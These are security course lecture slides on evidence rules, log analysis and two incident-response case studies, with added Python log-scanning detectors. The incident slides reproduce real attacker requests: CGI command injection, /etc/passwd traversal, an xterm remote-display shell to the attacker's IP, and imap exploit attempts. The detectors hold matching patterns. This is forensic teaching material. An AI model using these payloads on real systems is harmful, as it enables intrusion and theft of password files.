CSCI E-170: November 30, 2004
Administrivia
Federal Rules of Evidence
Logging
Integrity Management
Administrivia
Project Proposals are due today
– Who is in your group?
– What are you doing?
– Not graded
Quiz #2: You will be given 4 papers and expected to write a page on each.
Administrivia 2
Some students have not turned in any work to date…
– Think about dropping the course.
Students who do not turn in a final project will fail.
Federal Rules of Evidence
9 Articles
Many states follow FRE
Codifies common law
Why study them?
Article I: Ground Rules
Rule 101 - Scope
– Rule 1101 - Does not apply to preliminary questions of fact, grand jury, miscellaneous proceedings
Rule 102 - Purpose:
– Fairness
– Eliminate unjustifiable expense and delay
Rule 103 - Rulings on Evidence
– What to do when opposing parties disagree.
Article II: JUDICIAL NOTICE
Every case involves the use of hundreds or thousands of non-evidence facts
When a witness says “car,” everyone assumes that the “car” is an automobile, not a railroad car, that it is self-propelled, and so on.
ARTICLE III: PRESUMPTIONS IN CIVIL ACTIONS AND PROCEEDINGS
Determines who has the burden of rebutting the evidence.
Presumption imposes on the party against whom it is directed the burden of going forward with evidence to rebut or meet the presumption
ARTICLE IV: RELEVANCY AND ITS LIMITS
Relevant evidence is admissible
Irrelevant evidence is inadmissible
Evidence that wastes time can be excluded
Character evidence of defendant not admissible to prove conduct (unless introduced by defendant)
Character evidence of victim introduced only in homicide case to rebut evidence that alleged victim was first aggressor
Rule 412 - “rape shield” law
ARTICLE V: PRIVILEGES
“…may be interpreted by the courts of the United States in light of reason and experience”
ARTICLE VI: WITNESSES
Rule 601: Every person is competent to be a witness (except as otherwise provided)
Rule 602: Witness must have personal knowledge
Rule 605: Judge cannot testify as witness
Rule 606: Juror may not testify as witness
Rule 612: Adverse party is entitled access to “writing used to refresh memory”
ARTICLE VII: OPINIONS AND EXPERT TESTIMONY
Rule 701: Lay witness may not testify based on “scientific, technical, or other specialized knowledge”
Rule 702: Experts must be qualified; use reliable principles and methods; witness must apply standards to this case.
Rule 704: Experts may state an opinion of the “ultimate issue,” except for matters of mental state.
ARTICLE VIII: HEARSAY
Rule 801: “Hearsay” is a statement, other than one made by the declarant while testifying at the trial or hearing, offered in evidence to prove the truth of the matter asserted.
Many, many exceptions to hearsay…
– 803(5) - Recorded Recollection
– 803(6) - Records of regularly conducted activity
– 803(7) - Absence of entry in records kept in accordance with 803(6) “to prove nonoccurrence or nonexistence”
ARTICLE IX: AUTHENTICATION AND IDENTIFICATION
Rule 901: Documents must be authenticated; many examples given
Rule 902: Some documents are self-authenticating; (computer records aren’t)
ARTICLE X: CONTENTS OF WRITINGS, RECORDINGS, AND PHOTOGRAPHS
Rule 1002: Originals are required, except where duplicates may be admitted.
Rule 1003: Duplicates may be admitted unless genuine questions are raised about the authenticity or in “unfair” circumstances.
What is an original computer record?
ARTICLE XI: MISCELLANEOUS RULES
Rule 1101: Applicability
Rule 1102: Amendments
Rule 1103: Title
Orin S. Kerr article
What’s the point?
What are “Records of regularly conducted activity?”
Are computer records “monolithic?”
How do you authenticate computer records?
How are they challenged?
When do the Hearsay rules apply?
– What’s the deal with postings from websites of white supremacist groups?
– What about email in a harassment case?
What is a log?
Definition?
Unix vs. Windows?
Palm?
What gets logged?
Logins / logouts
Privilege escalation
Security relevant events
What goes in a log?
Why keep logs?
Why look at logs? (Marcus)
Policy
Legality
Cost saving
Common mistakes (Marcus)
#1 – collecting it and not looking at it (might as well log to /dev/null)
#2 – watching logs from perimeter systems while ignoring internal systems
#3 – Designing your log architecture before you decide what you’re going to collect
#4 – Only looking for what you know you want to find instead of just looking to see what you find.
Common Mistakes 2:
#5 – Proceeding without doing envelope estimates of load.
#6 – thinking your logs are evidence if you don’t collect them right
#7 – forgetting that this is just a data management problem
#8 – Drinking the XML Kool-ade
How are things logged?
f = fopen("logfile","w+")
syslog()
logger
Web Logs
access_log vs. error_log
65.54.188.137 - - [30/Nov/2004:00:16:54 -0500] "GET /photos/security/printTifs/medRes/onGray/platePlusStickerGreyMR.tif HTTP/1.0" 200 6017064 "-" "msnbot/0.3 (+http://search.msn.com/msnbot.htm)"
66.35.208.62 - - [30/Nov/2004:00:17:38 -0500] "GET /blog/index.rdf HTTP/1.1" 200 8882 "-" "Jakarta Commons-HttpClient/2.0.1"
Web logs…
grep 'q=' ~www/simson.net/logs/access_log | sed 's/^.*q=//' | awk '{print $1;}' | head
smart+identity+card&client=disney-go&start=10"
simson&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N"
backing+up+raid+drives&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N"
lzhuf&hl=en&lr=&ie=UTF-8&start=40&sa=N"
brown+simson&FORM=SMCRT"
%22home+wiring%22&_sb_lang=en"
%22wireless+photo+album%22&lr="
lzhuf+public+domain&hl=en&lr=&ie=UTF-8&start=10&sa=N"
simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta="
simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta="
Mail Logs
2004-11-13 23:51:35 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<[email protected]> rejected RCPT <[email protected]>: Unknown user
Radius Logs
Sun Mar 18 04:35:24 2001
    Acct-Session-Id = "00000000"
    NAS-IP-Address = 192.168.1.5
    Acct-Status-Type = Stop
    Acct-Session-Time = 0
    Acct-Delay-Time = 0
    Timestamp = 984918924
    Request-Authenticator = Verified
Sun Mar 18 04:35:24 2001
    Acct-Session-Id = "06000004"
    User-Name = "admin"
    NAS-IP-Address = 192.168.1.5
    Acct-Status-Type = Start
    Acct-Authentic = Local
    Service-Type = Administrative-User
    Login-Service = Telnet
    Login-IP-Host = 192.168.1.1
    Acct-Delay-Time = 75
    Timestamp = 984918924
    Request-Authenticator = Verified
Security Incidents: Strange Authentication Attempts
I woke up to find these entries in my RADIUS log file:
Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/system] (from nas xxxx/S99)
Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/password admin] (from nas xxxx/S99)
Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/13370n3z] (from nas xxxx/S99)
Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/fawkoffsz] (from nas xxxx/S99)
Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/save] (from nas xxxx/S99)
http://seclists.org/lists/incidents/2004/Mar/0116.html
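The mail-log and RADIUS excerpts above both show a single source failing over and over within seconds. The following is an added example, not code from the lecture: a Python burst detector that parses both line formats and reports any source exceeding a threshold inside a sliding window. The log lines inside it are constructed, and the MAIL_RE and RADIUS_RE patterns are assumptions about the two formats.

```python
"""Detect bursts of failures from one source in mail and RADIUS logs.

Added example (not from the lecture). Failures are grouped by source (sending
IP for mail rejects, NAS for RADIUS) and any source with at least `threshold`
failures inside a `window_seconds` interval is reported. The password that a
RADIUS failure line carries next to the user name is matched but never copied
out, so the detector's output is safe to forward.
"""
import re
from collections import defaultdict
from datetime import datetime

# Assumed Exim-style reject line:
#   2004-11-13 23:51:35 H=host (helo) [ip] F=<sender> rejected RCPT <rcpt>: Unknown user
MAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) H=\S+ (?:\(\S+\) )?\[(?P<ip>[^\]]+)\] "
    r"F=<[^>]*> rejected RCPT <(?P<rcpt>[^>]*)>: "
)
# Assumed RADIUS auth-failure line:
#   Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [user/password] (from nas host/port)
RADIUS_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}): Auth: Login incorrect: "
    r"\[(?P<user>[^/\]]*)/[^\]]*\] \(from nas (?P<nas>[^)]+)\)"
)


def parse_failure(line):
    """Return (timestamp, source, target) for a recognised failure line, else None."""
    m = MAIL_RE.match(line)
    if m:
        return datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["ip"], m["rcpt"]
    m = RADIUS_RE.match(line)
    if m:
        return datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), m["nas"], m["user"]
    return None


def find_bursts(lines, threshold=5, window_seconds=60):
    """Return {source: {"count", "first", "last", "targets"}} for each source whose
    failures reach `threshold` inside some window of `window_seconds`."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_failure(line)
        if parsed:
            ts, source, target = parsed
            events[source].append((ts, target))

    bursts = {}
    for source, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Advance the window start until [start, end] fits in window_seconds.
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            # Keep the densest window seen for this source.
            if count >= threshold and count > bursts.get(source, {}).get("count", 0):
                bursts[source] = {
                    "count": count,
                    "first": evs[start][0],
                    "last": evs[end][0],
                    "targets": sorted({t for _, t in evs[start:end + 1]}),
                }
    return bursts


# Constructed sample lines: one harvesting run against the mail server, one
# password-guessing run against a RADIUS NAS, one benign reject, one stray line.
SAMPLE_LINES = """\
2004-11-13 23:51:35 H=mx.example.net (mx.example.net) [192.0.2.44] F=<spam@example.net> rejected RCPT <alice@example.org>: Unknown user
2004-11-13 23:51:36 H=mx.example.net (mx.example.net) [192.0.2.44] F=<spam@example.net> rejected RCPT <bob@example.org>: Unknown user
2004-11-13 23:51:36 H=mx.example.net (mx.example.net) [192.0.2.44] F=<spam@example.net> rejected RCPT <carol@example.org>: Unknown user
2004-11-13 23:51:37 H=mx.example.net (mx.example.net) [192.0.2.44] F=<spam@example.net> rejected RCPT <dave@example.org>: Unknown user
2004-11-13 23:51:38 H=mx.example.net (mx.example.net) [192.0.2.44] F=<spam@example.net> rejected RCPT <erin@example.org>: Unknown user
2004-11-13 23:52:01 H=mx.example.net (mx.example.net) [192.0.2.44] F=<spam@example.net> rejected RCPT <frank@example.org>: Unknown user
2004-11-13 23:59:59 H=relay.example.com (relay.example.com) [198.51.100.7] F=<pat@example.com> rejected RCPT <typo@example.org>: Unknown user
Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/REDACTED] (from nas nas1/S99)
Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/REDACTED] (from nas nas1/S99)
Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/REDACTED] (from nas nas1/S99)
Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/REDACTED] (from nas nas1/S99)
Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/REDACTED] (from nas nas1/S99)
Tue Mar 30 10:26:05 2004: Auth: Login incorrect: [admin/REDACTED] (from nas nas1/S99)
2004-11-13 23:55:00 some unrelated line
"""

if __name__ == "__main__":
    for source, b in find_bursts(SAMPLE_LINES.splitlines()).items():
        print(f'{source}: {b["count"]} failures {b["first"]} .. {b["last"]} targets={b["targets"]}')
```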
Log architectures
UDP log issues
Windows
Logging on Unix
/etc/syslog.conf
/etc/newsyslog.conf
grep
swatch
Logging on Windows:
Event Viewer
Local security settings
Log hosts & Aggregation
Can you trust these logs?
October 7th, 1997
6:00pm
– Arrive hotel in New York City.
– Phone system does not support my modem.
– Cell phone reception is terrible.
8:45pm
– Phone call from Eric Bates.
– “I think that we have a visitor.”
Wed October 7th, 1997
User http is logged in on ttyp0 and idle for one day:
bash-2.02# w
 8:57PM  up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35
USER     TTY  FROM              LOGIN@   IDLE  WHAT
http     p0   KRLDB110-06.spli  Tue02AM  1days /bin/sh
simsong  p1   asy12.vineyard.n  8:42PM   15    -tcsh (tcsh)
ericx    p2   mac-ewb.vineyard  8:46PM   0     script
ericx    p3   mac-ewb.vineyard  8:46PM   11    top
ericx    p4   mac-ewb.vineyard  8:53PM   1     sleep 5
bash-2.02#
(Other employees had seen this and ignored it!)
First step: Document the machine
script(1) to create a transcript
– ps    process list
– netstat -a    open network connections
– (lsof)    open files
– grep ‘krldb’ access_log    likely avenue of attack
Goals:
– Don’t alarm intruder.
– Find mechanism of access
– Find out what he/she did.
– Plug the holes.
ps - processes
Attacker only had two processes
– /bin/sh on /dev/ttyp0 (2 copies)
– PID 18671 and 26225
– Idle since 2AM the previous day.
walden: {336} % grep p0 plist
http 18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh
http 26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.07 /bin/sh
walden: {337} %
netstat - network connections
“w” gave incomplete hostname:
– KRLDB110-06.spli
netstat revealed one connection -- x11!
bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
. . .
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
Use netstat -n to get the IP address, from which you can get the full DNS name.
access_log - showed attack
grep krldb /usr/local/apache/logs/access_log
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
Attacker GETs
GET /cgi-bin/phf?Qname=me%0als%20-lFa
GET /cgi-bin/faxsurvey?ls%20-lFa
GET /cgi-bin/view-source?../../../../../../../../etc/passwd
GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd
GET /cgi-bin/campas?%0als%20-lFa
GET /cgi-bin/handler/useless_shit;ls%20-lFa|?data=Download
GET /cgi-bin/php.cgi?/etc/passwd
GET /cgi-bin/faxsurvey?ls%20-lFa
GET /cgi-bin/faxsurvey?uname%20-a
GET /cgi-bin/faxsurvey?id
GET /cgi-bin/faxsurvey?cat%20/etc/passwd
GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/
GET /cgi-bin/faxsurvey?id
GET /cgi-bin/faxsurvey?pwd
GET /cgi-bin/faxsurvey?/bin/pwd
GET /cgi-bin/faxsurvey?ls%20-lFa
GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/
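The grep over access_log above is the manual version of the following added example (not code from the lecture): a Python scanner that URL-decodes each CGI request the way the script would see it and reports which of the patterns visible in the requests above each line trips, together with whether the status code suggests the script accepted the input. The sample lines and client addresses are constructed.

```python
"""Flag command-injection and traversal probes against CGI scripts in access_log.

Added example, not from the lecture. Each line is parsed, the request is split
into script path and query before decoding (so an encoded '?' cannot move the
split), both halves are URL-decoded, and a set of checks runs on the result.
"""
import re
from urllib.parse import unquote

# Common/combined log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<agent>[^"]*)"'
)


def _newline(path, query):
    return "\r" in query or "\n" in query            # %0a / %0d smuggled into an argument

def _metachar(path, query):
    return re.search(r"[;|`]|\$\(", path + "?" + query) is not None

def _traversal(path, query):
    return "../" in path + "?" + query

def _passwd(path, query):
    return re.search(r"/etc/(?:master\.)?passwd", path + "?" + query) is not None

def _bare_command(path, query):
    # A positional argument (no key=value) that contains whitespace looks like a
    # command line handed to a script that passes its argument to eval.
    return "=" not in query and re.search(r"\S\s+\S", query) is not None

# Order only determines the order of reason names in an alert.
CHECKS = [
    ("newline-in-query", _newline),
    ("shell-metachar", _metachar),
    ("path-traversal", _traversal),
    ("passwd-read", _passwd),
    ("bare-command", _bare_command),
]


def parse_line(line):
    """Parse one access_log line; return a dict of fields or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    raw_path, _, raw_query = rec["url"].partition("?")
    rec["path"] = unquote(raw_path)
    rec["query"] = unquote(raw_query)
    return rec


def scan(log_text):
    """Return one alert dict per CGI request that trips at least one check."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/cgi-bin/"):
            continue
        reasons = [name for name, check in CHECKS if check(rec["path"], rec["query"])]
        if reasons:
            alerts.append({
                "host": rec["host"],
                "time": rec["time"],
                "script": rec["path"],
                "decoded_query": rec["query"],
                "status": rec["status"],
                # 2xx: the script accepted the input; 404: the script is absent, so only a probe.
                "likely_executed": rec["status"].startswith("2"),
                "reasons": reasons,
            })
    return alerts


# Constructed sample: three probes from one client, two ordinary requests from another.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0"
203.0.113.5 - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0"
203.0.113.5 - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0"
192.0.2.9 - - [30/Nov/2004:00:17:38 -0500] "GET /blog/index.rdf HTTP/1.1" 200 8882 "-" "Jakarta Commons-HttpClient/2.0.1"
192.0.2.9 - - [30/Nov/2004:00:18:02 -0500] "GET /cgi-bin/search?q=smart+identity+card&start=10 HTTP/1.1" 200 1204 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        flag = "ACCEPTED" if a["likely_executed"] else "probe"
        print(f'{a["time"]} {a["host"]} {a["script"]} [{flag}] {",".join(a["reasons"])}: {a["decoded_query"]!r}')
```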
Facts so far
It looks like the faxsurvey program allowed attacker to run arbitrary programs.
No evidence that he ran xterm --- except for the X11 connection back to his machine.
We don’t know what he did or what else he knows.
Action plan
1. Add filter to router to block all access from splitrock (his ISP).
2. STOP his processes and gcore them to get command history.
• kill -STOP PIDs
• gcore -c file pid
• strings file
3. Rename/remove the faxsurvey program (part of hylafax system).
Selected environment variables from /bin/sh #1:
GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
REMOTE_ADDR=209.156.113.121
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
LOGNAME=http
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
DISPLAY=209.156.113.121:0.0
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
History from /bin/sh #1:
st2.c
cron.c
cxterm.c
x2.c
qpush.c
cat t.c
cat .c
cat s.c
gc c
ls -lFa
./s -v c2
./s p0
ls -lFa /
cat .s
ls -lFa
cat /w
ls -lFa /
cat .s
_=.s
$ : not found
gcc -o s steal.c
ls -lFa *.c
gcc -o s s.c
ftp 209.156.113.121
gcc -o s st2.c
./s console
t .s.121
qpush.c
pp.c
t2.c
cron.c
cxterm.c
tcsh
x2.c
README
README.debian
qpush
qpush.c
qpush.c.old
gf: not found
/tmp
mfs:28
/bin/sh
…Looks like the attacker was trying to get some sort of root-stealing exploit for Linux (or Debian Linux) to work on the machine.
Selected history from /bin/sh #2:
/bin/sh
/bin/sh
/etc/inetd.conf
qpush.c
/usr/bin/gcc
n/gcc
./cc
expr
done
/bin/sh
inetd.conf
t) | telnet 127.1 143
cd /etc
cat .s
which pwd
ls -lFa
expr $L + 1
ls -lFa
./cc -10
./cc
Attacker sees that we are running imap
Selected history from /bin/sh #2:
./cc
/tmp/.s
/tmp
cd /tmp
cd .s
L=100
cd .s
L=-100
ls -lFa
cd /tmp
/bin/sh
./q 127.1
load
/bins
_=127.1
_=/bins
./cc
./cc -92
./cc -100
./cc 100
cat .s
./cx
Attempts to exploit imap vulnerability
Selected history from /bin/sh #2:
cat .s
export L
_=.s
cat /etc/passwd |grep "root"
DISPLAY=209.156.113.121:0.0 -rv
gdsg
DISPLAY=209.156.113.121:0.0
cat /etc/passwd |Grep "http"
cat /etc/passwd |grep "http"
cat /etc/passwd |grep "www"
while [ $
: done
2 $L
echo $L
(./i 403 0xefbfd5e8 100; cat) |nc 127.1 143
cx $L
$L +1`
(./i 403 0xefbfd5e8 100; cat) | telnet 127.1 143
echo
./cc $L
L=`expr $L + 1`
Tries again for imap
Searching for accounts and passwords…
Selected history from /bin/sh #2:
uname
ftp 209.156.113.121
mv pp.c p.c
ls -lFa mas*
ls -lFa /etc |grep "mas"
cat master.passwd
telnet 127.1 25
locate modstat
which modstat
ls -lFa /usr/bin/mo*
locate modstat
elocateico s.c
locate modload
grep
ftp wildsau.idv.uni-lkii-lki
cat /etc/inetd.conf
./q -0 127.1
cat /etc/inetd.coinf
ftp 209.156.113.121
gcc -o cc cron.c
ftp 209.156.113.121
gcc -o cx cxterm.c
Tries again for sendmail
Tries for shadow password file
Tries for linux kernel module loader
And so on…
Epilogue
We spoke with Splitrock
– They didn’t seem to care (Splitrock is a prodigy dialup port in Texas.)
– Eventually we were forced to lower the block.
FBI didn’t care
– This guy is clearly good…
– But we didn’t have more than $8,000 in damages.
Vulnerability in faxsurvey had been reported July 29, 1998 – nearly three months before incident!
BUGTRAQ Report
Date: Tue, 4 Aug 1998 07:41:24 -0700
Reply-To: [email protected]
From: Tom <[email protected]>
Subject: remote exploit in faxsurvey cgi-script
Hi!
There exists a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server.
All the attacker has to do is type "http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd" in his favorite Web-Browser to get a copy of your Password-File.
All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package installed are vulnerable to this attack.
AFAIK the problem exists in the call of 'eval'.
I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <[email protected]> told me that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just remove the script from the file list.
Epilogue 2
Follow security advisories.
– Hard to do.
Don’t let http:
– run gcc
– read /usr/include
Detecting attacks with MRTG
Developed by
– Tobias Oetiker <[email protected]>
– Dave Rand <[email protected]>
Designed to graph bandwidth of connections
Useful for graphing any value that changes over time.
Typical MRTG uses
T1 utilization:
Dialup utilization:
More MRTG uses:
CPU utilization:
GIF response time:
MRTG shows changes over time
Hourly
Daily
Weekly
Monthly
May 19, 1998
10:00 am
– Meeting in Washington DC at the FBI.
3:30pm
– Get on train from Washington -> Boston (8 hour train ride - good chance to relax.)
4:30pm
– Call on cell phone from Aaron
Things are acting strange…
Single server
– WWW, POP, IMAP, etc.
CGI scripts terminating abnormally.
POP server sometimes disconnecting before e-mail is downloaded.
Finger doesn’t work quite right.
Rest of Internet seems normal.
What’s wrong?
No clue…
Reboot the computer!
Problem goes away for 30 minutes, then comes back…
Process list looks normal…
USER      PID %CPU %MEM  VSZ  RSS  TT  STAT STARTED    TIME COMMAND
simsong  1770 86.4  2.0 5184 5212  p3  R    5:34PM  4:47.73 /usr/local/bin/perl /usr/local/bin/report.www -v (report.www)
root    24659 31.4  0.0    0    0  ??  Z    4:19PM  0:00.00 (admin_server)
root     2345  2.0  0.1  220  284  ??  S    31Dec69 0:00.02 (ping)
root     1406  0.0  0.0    0    0  ??  Z    5:32PM  0:00.00 (junkbuster)
root        0  0.0  0.0    0    0  ??  DLs  Mon01PM 0:00.30 (swapper)
root        1  0.0  0.1  148  288  ??  Ss   Mon01PM 0:01.63 /sbin/init
root        2  0.0  0.0    0   12  ??  DL   Mon01PM 0:00.01 (pagedaemon)
root       15  0.0  0.0   68   64  ??  Is   Mon01PM 0:00.00 asyncd 2
root       17  0.0  0.0   68   64  ??  Is   Mon01PM 0:00.02 asyncd 2
root       26  0.0  0.8  748 2008  ??  Ss   Mon01PM 0:00.67 mfs -o rw -s 40960 /dev/sd0b /tmp (mount_mfs)
root       51  0.0  0.1  268  296  ??  Ss   Mon01PM 0:02.92 gettyd -s
root       62  0.0  0.1  160  340  ??  Ss   Mon01PM 1:19.11 syslogd
daemon     65  0.0  0.1  112  184  ??  Ss   Mon01PM 0:01.36 portmap
root       72  0.0  0.1  216  300  ??  Ss   Mon01PM 0:01.34 mountd
root       74  0.0  0.1  144  288  ??  Is   Mon01PM 0:00.01 nfsd-master (nfsd)
root       76  0.0  0.0   76  100  ??  I    Mon01PM 0:00.00 nfsd-server (nfsd)
root       77  0.0  0.0   76  100  ??  I    Mon01PM 0:00.04 nfsd-server (nfsd)
root       78  0.0  0.0   76  100  ??  I    Mon01PM 0:00.00 nfsd-server (nfsd)
root       79  0.0  0.0   76  100  ??  I    Mon01PM 0:00.00 nfsd-server (nfsd)
root       80  0.0  0.0   76  100  ??  I    Mon01PM 0:00.00 nfsd-server (nfsd)
MRTG reveals a problem…
Something is eating a lot of outgoing bandwidth…
BLUE is transmitted data
GREEN is received data
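As an added example (not part of the lecture and not MRTG's own code), the arithmetic MRTG applies to polled SNMP octet counters, including 32-bit counter wrap-around, is carried through in Python and paired with a trailing-baseline check that turns the outbound jump described above into an alert instead of a graph. The counter readings and the five-minute polling interval are constructed assumptions.

```python
"""Turn MRTG-style interface counters into rates and flag an outbound-traffic jump.

Added example, not from the lecture. MRTG polls SNMP octet counters
(ifInOctets/ifOutOctets) at a fixed interval and graphs the per-interval
rate; the same delta arithmetic, plus a comparison against a trailing
median, raises an alert when transmitted traffic jumps.
"""
from statistics import median

COUNTER_MAX = 2 ** 32      # SNMP Counter32 wraps to zero at this value
INTERVAL = 300             # seconds between polls (assumed five-minute polling)


def rates_from_counters(samples, counter_max=COUNTER_MAX, interval=INTERVAL):
    """samples: consecutive (rx_octets, tx_octets) counter readings, one per poll.

    Returns (rx_bytes_per_s, tx_bytes_per_s) for each pair of consecutive
    readings. Taking the difference modulo counter_max turns a single wrap
    between two polls into the true delta instead of a huge negative number.
    """
    rates = []
    for (rx0, tx0), (rx1, tx1) in zip(samples, samples[1:]):
        drx = (rx1 - rx0) % counter_max
        dtx = (tx1 - tx0) % counter_max
        rates.append((drx / interval, dtx / interval))
    return rates


def find_tx_anomalies(rates, baseline_polls=12, factor=5.0, min_rate=1000.0):
    """Flag intervals whose transmit rate exceeds `factor` times the median of the
    previous `baseline_polls` intervals and is at least `min_rate` B/s (so an idle
    link does not alert on noise). "poll" is the 0-based index of the reading
    that closed the flagged interval."""
    alerts = []
    for i in range(baseline_polls, len(rates)):
        baseline = median(tx for _, tx in rates[i - baseline_polls:i])
        tx = rates[i][1]
        if tx >= min_rate and tx > factor * max(baseline, 1.0):
            alerts.append({"poll": i + 1, "tx_bps": tx, "baseline_bps": baseline})
    return alerts


def build_sample_counters():
    """Constructed readings: 16 quiet intervals (about 20 KB/s out, 50 KB/s in),
    then three intervals at 1.5 MB/s out. The tx counter starts just below
    2**32 so the very first interval crosses a counter wrap."""
    samples = []
    rx, tx = 4_000_000_000, 4_294_000_000
    for i in range(20):
        samples.append((rx, tx))
        rx = (rx + 50_000 * INTERVAL) % COUNTER_MAX
        tx_step = (20_000 if i < 16 else 1_500_000) * INTERVAL
        tx = (tx + tx_step) % COUNTER_MAX
    return samples


if __name__ == "__main__":
    rates = rates_from_counters(build_sample_counters())
    for alert in find_tx_anomalies(rates):
        print(f'poll {alert["poll"]}: tx {alert["tx_bps"]:.0f} B/s vs baseline {alert["baseline_bps"]:.0f} B/s')
```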
Process list shows a problem far down from the top…
ftp 1471 0.0 0.2 740 496 ?? I 12:28PM 0:13.88 ds9.kulnet.kuleuven.ac.be: anonymous/[email protected]: RETR pwa98cbl.zip\r\n (ftpd)
ftp 1750 0.0 0.2 752 504 ?? S 12:32PM 0:12.79 ds9.kulnet.kuleuven.ac.be: anonymous/guest@: RETR pwa98cbj.zip\r\n (ftpd)
ftp 6982 0.0 0.2 288 480 ?? S 1:20PM 0:17.21 142.194.48.68: anonymous/getright@: RETR /simson/open/nothing_here/this_site_sucks/pwa98cbg.zip\r\n (ftpd)
ftp 10062 0.0 0.2 288 480 ?? S 1:53PM 0:00.27 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/ /calibreX/Win98.Final-PWA/pwa98cbf.zip\r\n (ftpd)
